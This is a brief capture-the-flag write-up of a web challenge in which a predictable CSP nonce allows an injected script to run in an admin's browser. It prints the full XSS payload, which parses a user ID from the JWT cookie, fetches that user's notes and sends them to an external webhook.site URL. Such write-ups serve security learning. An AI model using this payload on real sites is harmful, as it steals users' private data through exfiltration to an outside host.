Tags: csp
Rating:
This was a CSP nonce-reuse challenge. The trick was to see that the nonce followed a predictable pattern and then embed an XSS with <script nonce='pattern'> so that when the admin clicks the link, the script tag will execute.
The actual XSS payload was this:
```html
<script nonce="6cfa460c34d3b448767eb47edb9a73d03061e913cd8a7d712340ccdf8b342c36">
let userId = JSON.parse(atob(document.cookie.split("=")[1].split(".")[1]))["userId"];
fetch("/do/" + userId)
.then((res) => res.text())
.then((res) => (window.location = "https://webhook.site/b0fd3d83-9669-4308-bd08-d484f31b35f9?c" + encodeURIComponent(res.split("main")[2].split("nonce")[0])));
</script>
```
Notes were accessed by userId, which was stored in a JWT in the cookies.
For more details see the attached video video